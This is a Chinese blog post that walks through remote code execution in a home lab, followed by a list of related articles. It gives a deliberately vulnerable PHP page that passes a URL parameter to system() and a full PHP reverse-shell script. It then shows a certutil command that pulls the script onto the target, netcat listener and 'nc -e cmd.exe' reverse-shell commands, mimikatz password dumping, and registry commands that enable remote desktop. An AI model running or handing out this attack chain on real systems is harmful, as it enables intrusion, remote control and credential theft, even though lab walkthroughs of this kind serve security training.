RCE(远程代码执行漏洞)原理及漏洞利用

已于 2024-12-18 15:21:43 修改
阅读量4.9w 收藏 332
点赞数 57
分类专栏: 漏洞复现 RCE 文章标签: web 网络安全 RCE
于 2021-07-19 13:02:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46706771/article/details/118893434
版权
本文详细介绍了RCE(Remote Code Execution)漏洞,包括其原理、复现步骤以及如何利用该漏洞获取系统控制权。通过实例展示了如何通过cmd命令执行和远程下载文件来复现RCE漏洞,并探讨了获取Windows系统密码和开启远程连接服务的方法。此外,还提到了nc反弹shell的利用技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

作用

RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。

原理

一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器。 现在很多的企业都开始实施自动化运维,大量的系统操作会通过"自动化运维平台"进行操作。在这种平台上往往会出现远程系统命令执行的漏洞。 远程代码执行 同样的道理,因为需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。 不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。 因此,如果需要给前端用户提供操作类的API接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法。

系统命令执行函数

system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()

windows系统命令拼接方式

“|”:管道符,前面命令标准输出,后面命令的标准输入。例如:help |more
“&” commandA & commandB 先运行命令A,然后运行命令B
“||” commandA || commandB 运行命令A,如果失败则运行命令B
“&&” commandA && commandB 运行命令A,如果成功则运行命令B

RCE漏洞复现

一、复现环境

靶机:win10:ip:192.168.203.135

攻击机:win10:ip:192.168.123.150

get shell机:kali2020:ip:192.168.203.130

二、漏洞复现

1.靶机创建文件:1.php

<?php  
    header("Content-Type: text/html; charset=utf-8");
    error_reporting(0); //禁用错误报告  
    $a = $_GET["a"]; 
    system($a);
?>

在这里插入图片描述

2.攻击机创建文件:1.txt

<?php
set_time_limit(0);
$ip="192.168.203.130";  #kali ip
$port=3939;
$fp=@fsockopen($ip,$port,$errno,$errstr);
if(!$fp){ 
	echo "error";
	}
else{
	fputs($fp,"\n++++++++++connect success++++++++\n");
	while (!feof($fp)) {
	fputs($fp,"shell:");//输出
	$shell=fgets($fp);
	$message=`$shell`;
	fputs($fp,$message);

	}
	fclose($fp);
}

?>

在这里插入图片描述

3.访问1.php

靶机访问:

输入

http://192.168.203.135/1.php?a=ipconfig

发现可以执行cmd命令

在这里插入图片描述

攻击机也可访问:
在这里插入图片描述

漏洞利用

利用cmd命令远程下载文件 (在攻击机上创建1.txt文件,文件内容为上文提到的1.txt的内容)

使用cmd中的certutil命令将攻击机内上传的1.txt文件下载到靶机内并命名为2.php

certutil -urlcache -split -f http://192.168.123.150/1.txt 2.php

攻击机中访问:

 http://192.168.203.135/1.php?a=certutil -urlcache -split -f http://192.168.123.150/1.txt 2.php

在这里插入图片描述

使用kali的nc监听3939端口

nc -lvvp 3939

在这里插入图片描述

浏览器访问2.php文件

在这里插入图片描述

监听成功,成功get shell

在这里插入图片描述

在这里插入图片描述

其他利用
1.获取win7密码

如果靶机是win7,我们可以上传mimikatz.exe文件来获取win7系统的所有账号密码

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

在这里插入图片描述

获取账号密码后,就可以开启远程连接服务了

wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1

如果开启不成功,须执行以下命令

echo DO ALL IN CMD!
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f

net start termservice

然后再开启一次

wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1

最后主机使用快捷键win+s,搜索mstsc 就可以打开windos远程桌面连接了

2.nc反弹

向靶机上传nc.exe文件

nc 192.168.203.130 3939 -e C:\windows\system32\cmd.exe

kali监听

nc -lvvp 3939

成功get shell

RCE远程代码执行漏洞原理、危害、拼接字符、DVWA、pikachu、防御)
m0_61506558的博客
08-07 1484
什么是远程代码执行
RCE远程代码执行漏洞原理
彼岸花苏陌的博客
12-08 1459
RCE远程代码执行漏洞原理 一般在交换机或者路由器等等会设置一个ping的界面以便测试,如果防范不到会造成远程代码执行 一般使用ping会用到下面代码 $cmd = shell_exec( 'ping ' . $target ); 但是这个代码没有做任何处理,这样就会导致非预期输入例如: 输入:127.0.0.1|ipconfig 解释:|代表管道符,|的意思是只执行后面的程序 诸如此类的还有 || 前面为假则执行后面语句,否则只执行前面语句 & 无论前后是真是假都执行
RCE远程命令执行)漏洞详解
sev1n的博客
04-02 3635
RCE(remote command/code execute,远程命令执行)漏洞 远程代码执行 (RCE) 攻击是指攻击者可以在一个组织的计算机或网络上运行恶意代码。执行攻击者控制的代码的能力可用于各种目的,包括部署额外的恶意软件或窃取敏感数据。
RCE远程命令/代码执行漏洞原理及复现(转载)
weixin_48494542的博客
08-25 1141
本文转自行云博客https://www.xy586.top/ 作用 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 原理 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如果,设计者在完成该功能时,没有做严格的安全
RCE远程代码执行漏洞
最新发布
yh4494的博客
02-27 845
RCE远程代码执行漏洞”是指攻击者能够在目标系统上执行任意代码的漏洞,通常通过网络进行远程攻击。RCE 漏洞的危害非常大,攻击者通过这个漏洞可以控制目标机器,获取系统权限,执行恶意命令,甚至窃取敏感数据、植入恶意软件等。
网络安全-RCE远程命令执行)漏洞原理、攻击与防御
热门推荐
关注网络安全、云原生安全
10-05 1万+
目录 简介 原理 攻击 防御 参考 简介 RCE(remote command/code execute,远程命令执行)漏洞,一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。如果设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想
黑客=高材生?99%的黑客都没学过计算机
m0_71746416的博客
04-21 1665
黑客都是高学历吗?
(30)【RCE集合】RCE漏洞原理、出现地方、相关命令、函数解析、利用详细的过程
04-09 2876
详细理解RCE漏洞
远程代码执行漏洞利用
Z_l123的博客
03-01 457
PHP下,允许命令执行的函数有 eval() assert() preg_replace() call_user_func() $a($b) eval() <?php if(isset($_GET['a'])){ eval($_GET['a']); } else{ echo "Please input a"; } ?> assert() <?php if(isset($_GET['a'])){ assert($_GET['a']); } else{ e
RCE漏洞原理与常见场景
Kali与编程
04-10 1039
这意味着攻击者可以越过应用程序的正常边界,直接操控目标服务器或设备的核心功能,可能导致数据泄露、系统破坏、安装恶意软件,甚至完全控制目标系统。总之,RCE漏洞是对系统安全性构成严重威胁的一种漏洞类型,预防和解决此类漏洞需要从设计、编码、测试、运维等多个层面进行全方位的安全管控。RCE漏洞的根本原因在于应用程序未能正确验证用户输入,或者在处理敏感操作时未能进行严格的权限控制。的命令,系统将会先执行正常的ping命令,随后删除所有文件,这就是典型的命令注入导致的RCE。四、RCE漏洞的防范与缓解。
ThinkPHP5 5.0.23-rce远程代码执行漏洞复现
A2893992091的博客
09-08 1099
其版本5中,由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可执行任意方法,从而导致远程命令执行漏洞。通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码。判断是否存在漏洞:访问/index.php?s=captcha页面,会出现如下报错。切换目录到vulhub/thinkphp/5.0.23-rce下。使用HackBar 插件发送 POST 请求。端口为:8080,访问网站,搭建成功。访问shell.php,使用蚁剑连接。
RCE学习总结
Keeping it fresh at all times.
02-07 1770
为探讨清楚RCE的诸多细节,作者对学习过程进行了全面、详细、系统的总结,形成了本文。
pikachu靶场-RCE漏洞“ping”
m0_54146694的博客
12-30 1405
pikacha靶场
RCE漏洞总结及绕过---系统命令执行篇
qq_46603839的博客
04-23 5793
对于取反绕过~ 、参数逃逸等绕过方法放在了 代码执行漏洞篇中RCE漏洞防护1.对用户的输入作严格的过滤,建议使用白名单策略;2.尽量不使用容易产生漏洞的危险函数;
浅谈基础RCE
errorr0
01-22 1万+
一、什么是rce 二、能简单利用达到rce目的那些函数 1.eval() 2.assert()断言函数 3.call_user_func()&call_user_func_array()回调函数 4.create_function() 三、命令执行中所需要的函数 ①system() ②passthru() ③exec() 1.直接执行指令 2.间接使用其它函数达到指令的执行目的 ④shell_exec()&反撇(``) 四、命令执行绕过 1.空格过滤 2.过..
解密RCE漏洞原理剖析、复现与代码审计实战
congsec的博客
08-05 1712
网络安全领域,因其严重性和破坏力而备受关注。RCE漏洞允许攻击者在目标系统上执行任意代码,从而掌控整个系统,带来极大的安全风险。理解RCE漏洞的工作原理,并掌握其复现与代码审计技巧,对于提升系统安全性至关重要。本文将深入剖析RCE漏洞原理,展示如何在实际环境中复现该漏洞,并提供详尽的代码审计方法。无论您是网络安全初学者,还是资深开发者,都能从中获得实用的知识和技能。让我们一起解密RCE漏洞,提升我们的安全防护能力。
网络安全-渗透测试-RCE远程代码执行漏洞(1)-命令执行、代码执行
weixin_52796034的博客
10-26 4294
RCE(Remote Code Execution)远程代码执行漏洞(有时也叫命令执行漏洞)是一种安全漏洞,攻击者可以利用它来执行远程代码,从而控制受影响的系统。这种漏洞通常出现在应用程序或软件中,攻击者可以通过输入恶意构造的指令或数据,使得应用程序或软件在执行时执行攻击者指定的代码。RCE的范围比较广,只要渗透的最终结果可以实现执行命令或者代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE,通常情况下RCE漏洞都可以归为高危漏洞
远程代码执行漏洞及防御
慕舟舟的博客
03-25 2156
远程命令/代码执行漏洞(RC(command/code)E):RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统;
远程代码执行漏洞RCE原理
03-28
远程代码执行漏洞(Remote Code Execution,RCE)是指攻击者通过利用程序或系统中的漏洞,成功地在远程主机上执行自己编写或者上传的恶意代码。攻击者可以利用这个漏洞执行系统命令、上传或下载文件、获取敏感信息等,从而对系统进行攻击。 RCE漏洞原理是攻击者在程序或系统中注入恶意代码,并且成功执行该代码,从而实现攻击目的。攻击者通常利用程序或系统中的安全漏洞,比如未经过滤的用户输入、未授权的访问、缓冲区溢出等进行攻击,通过给予恶意代码执行权限,轻松地控制远程主机。 RCE漏洞的危害非常大,攻击者可以通过该漏洞远程控制系统,获取敏感信息,甚至篡改系统中的数据。因此,对于程序开发人员和系统管理员来说,必须要重视漏洞的防范和修复工作,及时更新补丁,加强安全防护,从而有效地防范远程代码执行漏洞的攻击。
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C1yas0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值